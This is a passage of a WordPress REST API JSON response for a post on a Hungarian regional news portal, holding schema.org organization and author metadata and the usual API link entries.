programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/38215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=38215"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/38215\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/38216"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=38215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=38215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=38215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}